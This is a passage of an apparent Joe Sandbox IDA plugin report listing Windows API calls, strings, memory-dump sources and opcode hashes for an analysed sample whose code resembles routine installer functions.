                                                                          • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                          • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                          • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                          APIs
                                                                          • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                          • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                          • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                          • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A022A08830$A480
                                                                          • String ID:
                                                                          • API String ID: 3036329673-0
                                                                          • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                          • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                          • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                          • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                          APIs
                                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$NameOpenResourceUniversal
                                                                          • String ID: Z
                                                                          • API String ID: 3604996873-1505515367
                                                                          • Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                          • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                          • Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                          • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                          APIs
                                                                          • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$EmptyRect
                                                                          • String ID:
                                                                          • API String ID: 182455014-2867612384
                                                                          • Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                          • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                          • Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                          • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                          • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                          • 73A0A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                                          • String ID: ...\
                                                                          • API String ID: 2998766281-983595016
                                                                          • Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                          • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
                                                                          • Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                          • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                          • RegisterClassA.USER32(?), ref: 004164DE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoRegisterUnregister
                                                                          • String ID: @
                                                                          • API String ID: 3749476976-2766056989
                                                                          • Opcode ID: 7b25cfcb3d4f9f28465275db2d67cdf9f267fbcc740a3ff75a925c386f358e46
                                                                          • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                          • Opcode Fuzzy Hash: 7b25cfcb3d4f9f28465275db2d67cdf9f267fbcc740a3ff75a925c386f358e46
                                                                          • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                          APIs
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                          • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorExecuteLastShellSystem
                                                                          • String ID: <$SuG
                                                                          • API String ID: 893404051-1504269210
                                                                          • Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                          • Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
                                                                          • Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                          • Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1220098344-2970929446
                                                                          • Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                          • Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
                                                                          • Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                          • Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                          APIs
                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                          • API String ID: 1312246647-2435364021
                                                                          • Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                          • Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
                                                                          • Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                          • Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                          Strings
                                                                          • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
Similarity
• API ID: MessageSend
• String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
• API String ID: 3850602802-3720027226
APIs
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• GetFocus.USER32 ref: 004771FF
• GetKeyState.USER32(0000007A), ref: 00477211
• WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
Similarity
• API ID: FocusMessageStateTextWaitWindow
• String ID: Wnd=$%x
• API String ID: 1381870634-2927251529
APIs
• FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
• FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
Similarity
• API ID: Time$File$LocalSystem
• String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
• API String ID: 1748579591-1013271723
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
• RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 00481F46
• CSDVersion, xrefs: 00481F70
Similarity
• API ID: CloseOpenQueryValue
• String ID: CSDVersion$System\CurrentControlSet\Control\Windows
• API String ID: 3677997916-1910633163
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetSystemWow64DirectoryA$kernel32.dll
• API String ID: 1646373207-4063490227
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
Similarity
• API ID: AddressHandleModuleProc
• String ID: ShutdownBlockReasonDestroy$user32.dll
• API String ID: 1646373207-260599015
APIs
• GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
Similarity
• API ID: AddressHandleModuleProc
• String ID: DisableProcessWindowsGhosting$user32.dll
• API String ID: 1646373207-834958232
APIs
  • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2238633743-2683653824
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,?,00000000,?,0047C68D), ref: 0047C3C0
• FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,?,00000000,?,0047C68D,00000000), ref: 0047C3DE
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
                                                                          • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                          • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                          • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                          • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                          APIs
                                                                            • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                            • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                          • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CountErrorFileLastMoveTick
                                                                          • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                          • API String ID: 2406187244-2685451598
                                                                          • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                          • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                          • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                          • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00413D56
                                                                          • GetDesktopWindow.USER32 ref: 00413E0E
                                                                            • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                            • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorDesktopWindow$Show
                                                                          • String ID:
                                                                          • API String ID: 2074268717-0
                                                                          • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                          • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                          • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                          • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$FileMessageModuleName
                                                                          • String ID:
                                                                          • API String ID: 704749118-0
                                                                          • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                          • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
